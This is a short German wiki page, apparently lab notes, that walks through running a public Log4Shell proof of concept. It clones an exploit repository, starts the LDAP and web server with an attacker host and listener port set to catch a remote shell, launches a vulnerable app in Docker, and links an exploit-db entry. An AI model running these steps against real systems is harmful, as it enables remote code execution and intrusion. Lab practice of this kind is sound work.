Log4j: Unterschied zwischen den Versionen

Aus Xinux Wiki

Zur Navigation springen Zur Suche springen

Version vom 17. Dezember 2021, 12:09 Uhr

Schaubild

drawio: log4j

Proof of Concept

git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc

Download und entpacken

jdk-8u20-linux-x64.tar.gz

Starten des LDAP und Webservers

python3 poc.py --userip brian.x-men.de --webport 8000 --lport 4545

Remoteshell listining

App starten eventuell auf anderem Rechner

git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc
docker build -t log4j-shell-poc .
docker run --network host log4j-shell-poc

Webseite öffnen

Exploit

https://www.exploit-db.com/exploits/50592

Abgerufen von „http://wiki.ixheim.de/index.php?title=Log4j&oldid=30589“